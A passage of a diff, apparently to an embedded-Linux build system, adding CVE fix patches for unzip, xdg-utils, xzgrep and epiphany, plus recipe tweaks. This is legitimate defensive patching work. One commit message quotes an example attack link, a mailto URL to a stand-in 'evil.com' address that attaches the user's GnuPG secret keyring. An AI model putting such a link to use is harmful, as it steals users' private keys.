-SRC_URI[tzdata.sha256sum] = "8d813957de363387696f05af8a8889afa282ab5016a764c701a20758d39cbaf3"
+SRC_URI[tzcode.sha256sum] = "80072894adff5a458f1d143e16e4ca1d8b2a122c9c5399da482cb68cba6a1ff8"
+SRC_URI[tzdata.sha256sum] = "0d0434459acbd2059a7a8da1f3304a84a86591f6ed69c6248fffa502b6edffe3"
diff --git a/meta/recipes-extended/timezone/tzdata.bb b/meta/recipes-extended/timezone/tzdata.bb
index e6a0655afe..cc6206ac70 100644
--- a/meta/recipes-extended/timezone/tzdata.bb
+++ b/meta/recipes-extended/timezone/tzdata.bb
@@ -19,13 +19,17 @@ TZONES= "africa antarctica asia australasia europe northamerica southamerica \
"
# pacificnew
+# "slim" is the default since 2020b
+# "fat" is needed by e.g. MariaDB's mysql_tzinfo_to_sql
+ZIC_FMT ?= "slim"
+
do_compile () {
for zone in ${TZONES}; do \
- ${STAGING_BINDIR_NATIVE}/zic -d ${WORKDIR}${datadir}/zoneinfo -L /dev/null \
+ ${STAGING_BINDIR_NATIVE}/zic -b ${ZIC_FMT} -d ${WORKDIR}${datadir}/zoneinfo -L /dev/null \
${S}/${zone} ; \
- ${STAGING_BINDIR_NATIVE}/zic -d ${WORKDIR}${datadir}/zoneinfo/posix -L /dev/null \
+ ${STAGING_BINDIR_NATIVE}/zic -b ${ZIC_FMT} -d ${WORKDIR}${datadir}/zoneinfo/posix -L /dev/null \
${S}/${zone} ; \
- ${STAGING_BINDIR_NATIVE}/zic -d ${WORKDIR}${datadir}/zoneinfo/right -L ${S}/leapseconds \
+ ${STAGING_BINDIR_NATIVE}/zic -b ${ZIC_FMT} -d ${WORKDIR}${datadir}/zoneinfo/right -L ${S}/leapseconds \
${S}/${zone} ; \
done
}
diff --git a/meta/recipes-extended/unzip/unzip/CVE-2021-4217.patch b/meta/recipes-extended/unzip/unzip/CVE-2021-4217.patch
new file mode 100644
index 0000000000..6ba2b879a3
--- /dev/null
+++ b/meta/recipes-extended/unzip/unzip/CVE-2021-4217.patch
@@ -0,0 +1,67 @@
+From 731d698377dbd1f5b1b90efeb8094602ed59fc40 Mon Sep 17 00:00:00 2001
+From: Nils Bars <nils.bars@t-online.de>
+Date: Mon, 17 Jan 2022 16:53:16 +0000
+Subject: [PATCH] Fix null pointer dereference and use of uninitialized data
+
+This fixes a bug that causes use of uninitialized heap data if `readbuf` fails
+to read as many bytes as indicated by the extra field length attribute.
+Furthermore, this fixes a null pointer dereference if an archive contains an
+`EF_UNIPATH` extra field but does not have a filename set.
+---
+ fileio.c | 5 ++++-
+ process.c | 6 +++++-
+ 2 files changed, 9 insertions(+), 2 deletions(-)
+---
+
+Patch from:
+https://bugs.launchpad.net/ubuntu/+source/unzip/+bug/1957077
+https://launchpadlibrarian.net/580782282/0001-Fix-null-pointer-dereference-and-use-of-uninitialized-data.patch
+Regenerated to apply without offsets.
+
+CVE: CVE-2021-4217
+
+Upstream-Status: Pending [infozip upstream inactive]
+
+Signed-off-by: Joe Slater <joe.slater@windriver.com>
+
+
+diff --git a/fileio.c b/fileio.c
+index 14460f3..1dc319e 100644
+--- a/fileio.c
++++ b/fileio.c
+@@ -2301,8 +2301,11 @@ int do_string(__G__ length, option) /* return PK-type error code */
+ seek_zipf(__G__ G.cur_zipfile_bufstart - G.extra_bytes +
+ (G.inptr-G.inbuf) + length);
+ } else {
+- if (readbuf(__G__ (char *)G.extra_field, length) == 0)
++ unsigned bytes_read = readbuf(__G__ (char *)G.extra_field, length);
++ if (bytes_read == 0)
+ return PK_EOF;
++ if (bytes_read != length)
++ return PK_ERR;
+ /* Looks like here is where extra fields are read */
+ if (getZip64Data(__G__ G.extra_field, length) != PK_COOL)
+ {
+diff --git a/process.c b/process.c
+index 5f8f6c6..de843a5 100644
+--- a/process.c
++++ b/process.c
+@@ -2058,10 +2058,14 @@ int getUnicodeData(__G__ ef_buf, ef_len)
+ G.unipath_checksum = makelong(offset + ef_buf);
+ offset += 4;
+
++ if (!G.filename_full) {
++ /* Check if we have a unicode extra section but no filename set */
++ return PK_ERR;
++ }
++
+ /*
+ * Compute 32-bit crc
+ */
+-
+ chksum = crc32(chksum, (uch *)(G.filename_full),
+ strlen(G.filename_full));
+
+--
+2.32.0
+
diff --git a/meta/recipes-extended/unzip/unzip/CVE-2022-0529.patch b/meta/recipes-extended/unzip/unzip/CVE-2022-0529.patch
new file mode 100644
index 0000000000..1c1e120deb
--- /dev/null
+++ b/meta/recipes-extended/unzip/unzip/CVE-2022-0529.patch
@@ -0,0 +1,39 @@
+https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1010355
+
+CVE: CVE-2022-0529
+Upstream-Status: Inactive-Upstream [need a new release]
+
+diff --git a/process.c b/process.c
+index d2a846e..99b9c7b 100644
+--- a/process.c
++++ b/process.c
+@@ -2507,13 +2507,15 @@ char *wide_to_local_string(wide_string, escape_all)
+ char buf[9];
+ char *buffer = NULL;
+ char *local_string = NULL;
++ size_t buffer_size;
+
+ for (wsize = 0; wide_string[wsize]; wsize++) ;
+
+ if (max_bytes < MAX_ESCAPE_BYTES)
+ max_bytes = MAX_ESCAPE_BYTES;
+
+- if ((buffer = (char *)malloc(wsize * max_bytes + 1)) == NULL) {
++ buffer_size = wsize * max_bytes + 1;
++ if ((buffer = (char *)malloc(buffer_size)) == NULL) {
+ return NULL;
+ }
+
+@@ -2552,7 +2554,11 @@ char *wide_to_local_string(wide_string, escape_all)
+ /* no MB for this wide */
+ /* use escape for wide character */
+ char *escape_string = wide_to_escape_string(wide_string[i]);
+- strcat(buffer, escape_string);
++ size_t buffer_len = strlen(buffer);
++ size_t escape_string_len = strlen(escape_string);
++ if (buffer_len + escape_string_len + 1 > buffer_size)
++ escape_string_len = buffer_size - buffer_len - 1;
++ strncat(buffer, escape_string, escape_string_len);
+ free(escape_string);
+ }
+ }
diff --git a/meta/recipes-extended/unzip/unzip/CVE-2022-0530.patch b/meta/recipes-extended/unzip/unzip/CVE-2022-0530.patch
new file mode 100644
index 0000000000..363dafddc9
--- /dev/null
+++ b/meta/recipes-extended/unzip/unzip/CVE-2022-0530.patch
@@ -0,0 +1,33 @@
+https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1010355
+
+CVE: CVE-2022-0530
+Upstream-Status: Inactive-Upstream [need a new release]
+
+diff --git a/fileio.c b/fileio.c
+index 6290824..77e4b5f 100644
+--- a/fileio.c
++++ b/fileio.c
+@@ -2361,6 +2361,9 @@ int do_string(__G__ length, option) /* return PK-type error code */
+ /* convert UTF-8 to local character set */
+ fn = utf8_to_local_string(G.unipath_filename,
+ G.unicode_escape_all);
++ if (fn == NULL)
++ return PK_ERR;
++
+ /* make sure filename is short enough */
+ if (strlen(fn) >= FILNAMSIZ) {
+ fn[FILNAMSIZ - 1] = '\0';
+diff --git a/process.c b/process.c
+index d2a846e..715bc0f 100644
+--- a/process.c
++++ b/process.c
+@@ -2605,6 +2605,8 @@ char *utf8_to_local_string(utf8_string, escape_all)
+ int escape_all;
+ {
+ zwchar *wide = utf8_to_wide_string(utf8_string);
++ if (wide == NULL)
++ return NULL;
+ char *loc = wide_to_local_string(wide, escape_all);
+ free(wide);
+ return loc;
+
diff --git a/meta/recipes-extended/unzip/unzip_6.0.bb b/meta/recipes-extended/unzip/unzip_6.0.bb
index c1ea0a9a2c..fa57c8f5bd 100644
--- a/meta/recipes-extended/unzip/unzip_6.0.bb
+++ b/meta/recipes-extended/unzip/unzip_6.0.bb
@@ -1,5 +1,6 @@
SUMMARY = "Utilities for extracting and viewing files in .zip archives"
HOMEPAGE = "http://www.info-zip.org"
+DESCRIPTION = "Info-ZIP's purpose is to provide free, portable, high-quality versions of the Zip and UnZip compressor-archiver utilities that are compatible with the DOS-based PKZIP by PKWARE, Inc."
SECTION = "console/utils"
LICENSE = "BSD-3-Clause"
LIC_FILES_CHKSUM = "file://LICENSE;md5=94caec5a51ef55ef711ee4e8b1c69e29"
@@ -25,12 +26,18 @@ SRC_URI = "${SOURCEFORGE_MIRROR}/infozip/UnZip%206.x%20%28latest%29/UnZip%206.0/
file://CVE-2019-13232_p1.patch \
file://CVE-2019-13232_p2.patch \
file://CVE-2019-13232_p3.patch \
+ file://CVE-2021-4217.patch \
+ file://CVE-2022-0529.patch \
+ file://CVE-2022-0530.patch \
"
UPSTREAM_VERSION_UNKNOWN = "1"
SRC_URI[md5sum] = "62b490407489521db863b523a7f86375"
SRC_URI[sha256sum] = "036d96991646d0449ed0aa952e4fbe21b476ce994abc276e49d30e686708bd37"
+# Patch from https://bugzilla.redhat.com/attachment.cgi?id=293893&action=diff applied to 6.0 source
+CVE_CHECK_WHITELIST += "CVE-2008-0888"
+
# exclude version 5.5.2 which triggers a false positive
UPSTREAM_CHECK_REGEX = "unzip(?P<pver>(?!552).+)\.tgz"
diff --git a/meta/recipes-extended/watchdog/watchdog_5.15.bb b/meta/recipes-extended/watchdog/watchdog_5.15.bb
index 1acab2e9e7..0adf1fbb41 100644
--- a/meta/recipes-extended/watchdog/watchdog_5.15.bb
+++ b/meta/recipes-extended/watchdog/watchdog_5.15.bb
@@ -18,6 +18,10 @@ SRC_URI = "${SOURCEFORGE_MIRROR}/watchdog/watchdog-${PV}.tar.gz \
SRC_URI[md5sum] = "678c32f6f35a0492c9c1b76b4aa88828"
SRC_URI[sha256sum] = "ffdc865137ad5d8e53664bd22bad4de6ca136d1b4636720320cb52af0c18947c"
+# Can be dropped when the output next changes, avoids failures after
+# reproducibility issues
+PR = "r1"
+
UPSTREAM_CHECK_URI = "http://sourceforge.net/projects/watchdog/files/watchdog/"
UPSTREAM_CHECK_REGEX = "/watchdog/(?P<pver>(\d+[\.\-_]*)+)/"
@@ -28,6 +32,7 @@ CFLAGS += "-I${STAGING_INCDIR}/tirpc"
LDFLAGS += "-ltirpc"
EXTRA_OECONF += " --disable-nfs "
+CACHED_CONFIGUREVARS += "ac_cv_path_PATH_SENDMAIL=${sbindir}/sendmail"
INITSCRIPT_PACKAGES = "${PN} ${PN}-keepalive"
diff --git a/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch
new file mode 100644
index 0000000000..948b9e22e9
--- /dev/null
+++ b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch
@@ -0,0 +1,58 @@
+From 1f199813e0eb0246f63b54e9e154970e609575af Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= <joerg@thalheim.io>
+Date: Tue, 18 Aug 2020 16:52:24 +0100
+Subject: [PATCH] xdg-email: remove attachment handling from mailto
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This allows attacker to extract secrets from users:
+
+mailto:sid@evil.com?attach=/.gnupg/secring.gpg
+
+See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425
+and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177
+
+Signed-off-by: Jörg Thalheim <joerg@thalheim.io>
+---
+ scripts/xdg-email.in | 7 +------
+ 1 file changed, 1 insertion(+), 6 deletions(-)
+
+Upstream-Status: Backport
+CVE: CVE-2020-27748
+
+diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in
+index 6db58ad..5d2f4f3 100644
+--- a/scripts/xdg-email.in
++++ b/scripts/xdg-email.in
+@@ -32,7 +32,7 @@ _USAGE
+
+ run_thunderbird()
+ {
+- local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH
++ local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY
+ THUNDERBIRD="$1"
+ MAILTO=$(echo "$2" | sed 's/^mailto://')
+ echo "$MAILTO" | grep -qs "^?"
+@@ -48,7 +48,6 @@ run_thunderbird()
+ BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
+ SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1)
+ BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1)
+- ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }' | sed 's/,$//'))
+
+ if [ -z "$TO" ] ; then
+ NEWMAILTO=
+@@ -68,10 +67,6 @@ run_thunderbird()
+ NEWMAILTO="${NEWMAILTO},$BODY"
+ fi
+
+- if [ -n "$ATTACH" ] ; then
+- NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'"
+- fi
+-
+ NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//')
+ DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\""
+ "$THUNDERBIRD" -compose "$NEWMAILTO"
+--
+GitLab
+
diff --git a/meta/recipes-extended/xdg-utils/xdg-utils/CVE-2022-4055.patch b/meta/recipes-extended/xdg-utils/xdg-utils/CVE-2022-4055.patch
new file mode 100644
index 0000000000..383634ad53
--- /dev/null
+++ b/meta/recipes-extended/xdg-utils/xdg-utils/CVE-2022-4055.patch
@@ -0,0 +1,165 @@
+From f67c4d1f8bd2e3cbcb9eb49f5e897075e7426780 Mon Sep 17 00:00:00 2001
+From: Gabriel Corona <gabriel.corona@enst-bretagne.fr>
+Date: Thu, 25 Aug 2022 23:51:45 +0200
+Subject: [PATCH] Disable special support for Thunderbird in xdg-email (fixes
+ CVE-2020-27748, CVE-2022-4055)
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xdg/xdg-utils/-/commit/f67c4d1f8bd2e3cbcb9eb49f5e897075e7426780]
+CVE: CVE-2022-4055
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ scripts/xdg-email.in | 108 -------------------------------------------
+ 1 file changed, 108 deletions(-)
+
+diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in
+index 13ba2d5..b700679 100644
+--- a/scripts/xdg-email.in
++++ b/scripts/xdg-email.in
+@@ -30,76 +30,8 @@ _USAGE
+
+ #@xdg-utils-common@
+
+-run_thunderbird()
+-{
+- local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY
+- THUNDERBIRD="$1"
+- MAILTO=$(echo "$2" | sed 's/^mailto://')
+- echo "$MAILTO" | grep -qs "^?"
+- if [ "$?" = "0" ] ; then
+- MAILTO=$(echo "$MAILTO" | sed 's/^?//')
+- else
+- MAILTO=$(echo "$MAILTO" | sed 's/^/to=/' | sed 's/?/\&/')
+- fi
+-
+- MAILTO=$(echo "$MAILTO" | sed 's/&/\n/g')
+- TO=$(/bin/echo -e $(echo "$MAILTO" | grep '^to=' | sed 's/^to=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
+- CC=$(/bin/echo -e $(echo "$MAILTO" | grep '^cc=' | sed 's/^cc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
+- BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
+- SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1)
+- BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1)
+-
+- if [ -z "$TO" ] ; then
+- NEWMAILTO=
+- else
+- NEWMAILTO="to='$TO'"
+- fi
+- if [ -n "$CC" ] ; then
+- NEWMAILTO="${NEWMAILTO},cc='$CC'"
+- fi
+- if [ -n "$BCC" ] ; then
+- NEWMAILTO="${NEWMAILTO},bcc='$BCC'"
+- fi
+- if [ -n "$SUBJECT" ] ; then
+- NEWMAILTO="${NEWMAILTO},$SUBJECT"
+- fi
+- if [ -n "$BODY" ] ; then
+- NEWMAILTO="${NEWMAILTO},$BODY"
+- fi
+-
+- NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//')
+- DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\""
+- "$THUNDERBIRD" -compose "$NEWMAILTO"
+- if [ $? -eq 0 ]; then
+- exit_success
+- else
+- exit_failure_operation_failed
+- fi
+-}
+-
+ open_kde()
+ {
+- if [ -n "$KDE_SESSION_VERSION" ] && [ "$KDE_SESSION_VERSION" -ge 5 ]; then
+- local kreadconfig=kreadconfig$KDE_SESSION_VERSION
+- else
+- local kreadconfig=kreadconfig
+- fi
+-
+- if which $kreadconfig >/dev/null 2>&1; then
+- local profile=$($kreadconfig --file emaildefaults \
+- --group Defaults --key Profile)
+- if [ -n "$profile" ]; then
+- local client=$($kreadconfig --file emaildefaults \
+- --group "PROFILE_$profile" \
+- --key EmailClient \
+- | cut -d ' ' -f 1)
+-
+- if echo "$client" | grep -Eq 'thunderbird|icedove'; then
+- run_thunderbird "$client" "$1"
+- fi
+- fi
+- fi
+-
+ local command
+ case "$KDE_SESSION_VERSION" in
+ '') command=kmailservice ;;
+@@ -130,15 +62,6 @@ open_kde()
+
+ open_gnome3()
+ {
+- local client
+- local desktop
+- desktop=`xdg-mime query default "x-scheme-handler/mailto"`
+- client=`desktop_file_to_binary "$desktop"`
+- echo $client | grep -E 'thunderbird|icedove' > /dev/null 2>&1
+- if [ $? -eq 0 ] ; then
+- run_thunderbird "$client" "$1"
+- fi
+-
+ if gio help open 2>/dev/null 1>&2; then
+ DEBUG 1 "Running gio open \"$1\""
+ gio open "$1"
+@@ -159,13 +82,6 @@ open_gnome3()
+
+ open_gnome()
+ {
+- local client
+- client=`gconftool-2 --get /desktop/gnome/url-handlers/mailto/command | cut -d ' ' -f 1` || ""
+- echo $client | grep -E 'thunderbird|icedove' > /dev/null 2>&1
+- if [ $? -eq 0 ] ; then
+- run_thunderbird "$client" "$1"
+- fi
+-
+ if gio help open 2>/dev/null 1>&2; then
+ DEBUG 1 "Running gio open \"$1\""
+ gio open "$1"
+@@ -231,15 +147,6 @@ open_flatpak()
+
+ open_generic()
+ {
+- local client
+- local desktop
+- desktop=`xdg-mime query default "x-scheme-handler/mailto"`
+- client=`desktop_file_to_binary "$desktop"`
+- echo $client | grep -E 'thunderbird|icedove' > /dev/null 2>&1
+- if [ $? -eq 0 ] ; then
+- run_thunderbird "$client" "$1"
+- fi
+-
+ xdg-open "$1"
+ local ret=$?
+
+@@ -364,21 +271,6 @@ while [ $# -gt 0 ] ; do
+ shift
+ ;;
+
+- --attach)
+- if [ -z "$1" ] ; then
+- exit_failure_syntax "file argument missing for --attach option"
+- fi
+- check_input_file "$1"
+- file=`readlink -f "$1"` # Normalize path
+- if [ -z "$file" ] || [ ! -f "$file" ] ; then
+- exit_failure_file_missing "file '$1' does not exist"
+- fi
+-
+- url_encode "$file"
+- options="${options}attach=${result}&"
+- shift
+- ;;
+-
+ -*)
+ exit_failure_syntax "unexpected option '$parm'"
+ ;;
+--
+2.25.1
+
diff --git a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
index d371c5c28c..f6989430f5 100644
--- a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
+++ b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
@@ -20,6 +20,8 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=a5367a90934098d6b05af3b746405014"
SRC_URI = "https://portland.freedesktop.org/download/${BPN}-${PV}.tar.gz \
file://0001-Reinstate-xdg-terminal.patch \
file://0001-Don-t-build-the-in-script-manual.patch \
+ file://1f199813e0eb0246f63b54e9e154970e609575af.patch \
+ file://CVE-2022-4055.patch \
"
SRC_URI[md5sum] = "902042508b626027a3709d105f0b63ff"
diff --git a/meta/recipes-extended/xinetd/xinetd_2.3.15.bb b/meta/recipes-extended/xinetd/xinetd_2.3.15.bb
index 6e43f5be6f..765a34e842 100644
--- a/meta/recipes-extended/xinetd/xinetd_2.3.15.bb
+++ b/meta/recipes-extended/xinetd/xinetd_2.3.15.bb
@@ -1,5 +1,6 @@
SUMMARY = "Socket-based service activation daemon"
HOMEPAGE = "https://github.com/xinetd-org/xinetd"
+DESCRIPTION = "xinetd is a powerful replacement for inetd, xinetd has access control mechanisms, extensive logging capabilities, the ability to make services available based on time, can place limits on the number of servers that can be started, and has deployable defence mechanisms to protect against port scanners, among other things."
# xinetd is a BSD-like license
# Apple and Gentoo say BSD here.
@@ -12,7 +13,7 @@ PR = "r2"
# Blacklist a bogus tag in upstream check
UPSTREAM_CHECK_GITTAGREGEX = "xinetd-(?P<pver>(?!20030122).+)"
-SRC_URI = "git://github.com/xinetd-org/xinetd.git;protocol=https \
+SRC_URI = "git://github.com/xinetd-org/xinetd.git;protocol=https;branch=master \
file://xinetd.init \
file://xinetd.conf \
file://xinetd.default \
diff --git a/meta/recipes-extended/xz/xz/CVE-2022-1271.patch b/meta/recipes-extended/xz/xz/CVE-2022-1271.patch
new file mode 100644
index 0000000000..7841a534d3
--- /dev/null
+++ b/meta/recipes-extended/xz/xz/CVE-2022-1271.patch
@@ -0,0 +1,96 @@
+From 6bb2369742f9ff0451c245e8ca9b9dfac0cc88ba Mon Sep 17 00:00:00 2001
+From: Lasse Collin <lasse.collin@tukaani.org>
+Date: Tue, 29 Mar 2022 19:19:12 +0300
+Subject: [PATCH] xzgrep: Fix escaping of malicious filenames (ZDI-CAN-16587).
+
+Malicious filenames can make xzgrep to write to arbitrary files
+or (with a GNU sed extension) lead to arbitrary code execution.
+
+xzgrep from XZ Utils versions up to and including 5.2.5 are
+affected. 5.3.1alpha and 5.3.2alpha are affected as well.
+This patch works for all of them.
+
+This bug was inherited from gzip's zgrep. gzip 1.12 includes
+a fix for zgrep.
+
+The issue with the old sed script is that with multiple newlines,
+the N-command will read the second line of input, then the
+s-commands will be skipped because it's not the end of the
+file yet, then a new sed cycle starts and the pattern space
+is printed and emptied. So only the last line or two get escaped.
+
+One way to fix this would be to read all lines into the pattern
+space first. However, the included fix is even simpler: All lines
+except the last line get a backslash appended at the end. To ensure
+that shell command substitution doesn't eat a possible trailing
+newline, a colon is appended to the filename before escaping.
+The colon is later used to separate the filename from the grep
+output so it is fine to add it here instead of a few lines later.
+
+The old code also wasn't POSIX compliant as it used \n in the
+replacement section of the s-command. Using \<newline> is the
+POSIX compatible method.
+
+LC_ALL=C was added to the two critical sed commands. POSIX sed
+manual recommends it when using sed to manipulate pathnames
+because in other locales invalid multibyte sequences might
+cause issues with some sed implementations. In case of GNU sed,
+these particular sed scripts wouldn't have such problems but some
+other scripts could have, see:
+
+ info '(sed)Locale Considerations'
+
+This vulnerability was discovered by:
+cleemy desu wayo working with Trend Micro Zero Day Initiative
+
+Thanks to Jim Meyering and Paul Eggert discussing the different
+ways to fix this and for coordinating the patch release schedule
+with gzip.
+
+Upstream-Status: Backport [https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch]
+CVE: CVE-2022-1271
+
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+---
+ src/scripts/xzgrep.in | 20 ++++++++++++--------
+ 1 file changed, 12 insertions(+), 8 deletions(-)
+
+diff --git a/src/scripts/xzgrep.in b/src/scripts/xzgrep.in
+index a1fd19c..da1e65b 100644
+--- a/src/scripts/xzgrep.in
++++ b/src/scripts/xzgrep.in
+@@ -178,22 +178,26 @@ for i; do
+ { test $# -eq 1 || test $no_filename -eq 1; }; then
+ eval "$grep"
+ else
++ # Append a colon so that the last character will never be a newline
++ # which would otherwise get lost in shell command substitution.
++ i="$i:"
++
++ # Escape & \ | and newlines only if such characters are present
++ # (speed optimization).
+ case $i in
+ (*'
+ '* | *'&'* | *'\'* | *'|'*)
+- i=$(printf '%s\n' "$i" |
+- sed '
+- $!N
+- $s/[&\|]/\\&/g
+- $s/\n/\\n/g
+- ');;
++ i=$(printf '%s\n' "$i" | LC_ALL=C sed 's/[&\|]/\\&/g; $!s/$/\\/');;
+ esac
+- sed_script="s|^|$i:|"
++
++ # $i already ends with a colon so don't add it here.
++ sed_script="s|^|$i|"
+
+ # Fail if grep or sed fails.
+ r=$(
+ exec 4>&1
+- (eval "$grep" 4>&-; echo $? >&4) 3>&- | sed "$sed_script" >&3 4>&-
++ (eval "$grep" 4>&-; echo $? >&4) 3>&- |
++ LC_ALL=C sed "$sed_script" >&3 4>&-
+ ) || r=2
+ exit $r
+ fi >&3 5>&-
diff --git a/meta/recipes-extended/xz/xz_5.2.4.bb b/meta/recipes-extended/xz/xz_5.2.4.bb
index 1c4450a9e9..6d80a4f2e9 100644
--- a/meta/recipes-extended/xz/xz_5.2.4.bb
+++ b/meta/recipes-extended/xz/xz_5.2.4.bb
@@ -1,5 +1,6 @@
SUMMARY = "Utilities for managing LZMA compressed files"
HOMEPAGE = "https://tukaani.org/xz/"
+DESCRIPTION = "XZ Utils is free general-purpose data compression software with a high compression ratio. XZ Utils were written for POSIX-like systems, but also work on some not-so-POSIX systems. XZ Utils are the successor to LZMA Utils."
SECTION = "base"
# The source includes bits of PD, GPLv2, GPLv3, LGPLv2.1+, but the only file
@@ -22,7 +23,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=97d554a32881fee0aa283d96e47cb24a \
file://lib/getopt.c;endline=23;md5=2069b0ee710572c03bb3114e4532cd84 \
"
-SRC_URI = "https://tukaani.org/xz/xz-${PV}.tar.gz"
+SRC_URI = "https://tukaani.org/xz/xz-${PV}.tar.gz \
+ file://CVE-2022-1271.patch \
+ "
SRC_URI[md5sum] = "5ace3264bdd00c65eeec2891346f65e6"
SRC_URI[sha256sum] = "b512f3b726d3b37b6dc4c8570e137b9311e7552e8ccbab4d39d47ce5f4177145"
UPSTREAM_CHECK_REGEX = "xz-(?P<pver>\d+(\.\d+)+)\.tar"
diff --git a/meta/recipes-extended/zip/zip_3.0.bb b/meta/recipes-extended/zip/zip_3.0.bb
index c00a932763..18b5d8648e 100644
--- a/meta/recipes-extended/zip/zip_3.0.bb
+++ b/meta/recipes-extended/zip/zip_3.0.bb
@@ -1,5 +1,6 @@
SUMMARY = "Compressor/archiver for creating and modifying .zip files"
HOMEPAGE = "http://www.info-zip.org"
+DESCRIPTION = "Info-ZIP's purpose is to provide free, portable, high-quality versions of the Zip and UnZip compressor-archiver utilities that are compatible with the DOS-based PKZIP by PKWARE, Inc."
SECTION = "console/utils"
LICENSE = "BSD-3-Clause"
@@ -19,6 +20,12 @@ UPSTREAM_VERSION_UNKNOWN = "1"
SRC_URI[md5sum] = "7b74551e63f8ee6aab6fbc86676c0d37"
SRC_URI[sha256sum] = "f0e8bb1f9b7eb0b01285495a2699df3a4b766784c1765a8f1aeedf63c0806369"
+# Disputed and also Debian doesn't consider a vulnerability
+CVE_CHECK_WHITELIST += "CVE-2018-13410"
+
+# Not for zip but for smart contract implementation for it
+CVE_CHECK_WHITELIST += "CVE-2018-13684"
+
# zip.inc sets CFLAGS, but what Makefile actually uses is
# CFLAGS_NOOPT. It will also force -O3 optimization, overriding
# whatever we set.
diff --git a/meta/recipes-gnome/epiphany/epiphany_3.34.4.bb b/meta/recipes-gnome/epiphany/epiphany_3.34.4.bb
index ddb4c2794f..f43bfd6a67 100644
--- a/meta/recipes-gnome/epiphany/epiphany_3.34.4.bb
+++ b/meta/recipes-gnome/epiphany/epiphany_3.34.4.bb
@@ -1,4 +1,7 @@
SUMMARY = "WebKit based web browser for GNOME"
+DESCRIPTION = "Epiphany is an open source web browser for the Linux desktop environment. \
+It provides a simple and easy-to-use internet browsing experience."
+HOMEPAGE = "https://wiki.gnome.org/Apps/Web"
BUGTRACKER = "https://gitlab.gnome.org/GNOME/epiphany"
LICENSE = "GPLv3+"
LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
@@ -13,6 +16,7 @@ REQUIRED_DISTRO_FEATURES = "x11 opengl"
SRC_URI = "${GNOME_MIRROR}/${GNOMEBN}/${@gnome_verdir("${PV}")}/${GNOMEBN}-${PV}.tar.${GNOME_COMPRESS_TYPE};name=archive \
file://0002-help-meson.build-disable-the-use-of-yelp.patch \
+ file://CVE-2022-29536.patch \
"
SRC_URI[archive.md5sum] = "a559f164bb7d6cbeceb348648076830b"
SRC_URI[archive.sha256sum] = "60e190fc07ec7e33472e60c7e633e04004f7e277a0ffc5e9cd413706881e598d"
diff --git a/meta/recipes-gnome/epiphany/files/CVE-2022-29536.patch b/meta/recipes-gnome/epiphany/files/CVE-2022-29536.patch
new file mode 100644
index 0000000000..71cfc1238a
--- /dev/null
+++ b/meta/recipes-gnome/epiphany/files/CVE-2022-29536.patch
@@ -0,0 +1,46 @@
+CVE: CVE-2022-29536
+Upstream-Status: Backport [ https://gitlab.gnome.org/GNOME/epiphany/-/commit/486da133569ebfc436c959a7419565ab102e8525 ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+From 486da133569ebfc436c959a7419565ab102e8525 Mon Sep 17 00:00:00 2001
+From: Michael Catanzaro <mcatanzaro@redhat.com>
+Date: Fri, 15 Apr 2022 18:09:46 -0500
+Subject: [PATCH] Fix memory corruption in ephy_string_shorten()
+
+This fixes a regression that I introduced in 232c613472b38ff0d0d97338f366024ddb9cd228.
+
+I got my browser stuck in a crash loop today while visiting a website
+with a page title greater than ephy-embed.c's MAX_TITLE_LENGTH, the only
+condition in which ephy_string_shorten() is ever used. Turns out this
+commit is wrong: an ellipses is a multibyte character (three bytes in
+UTF-8) and so we're writing past the end of the buffer when calling
+strcat() here. Ooops.
+
+Shame it took nearly four years to notice and correct this.
+
+Part-of: <https://gitlab.gnome.org/GNOME/epiphany/-/merge_requests/1106>
+---
+ lib/ephy-string.c | 5 ++---
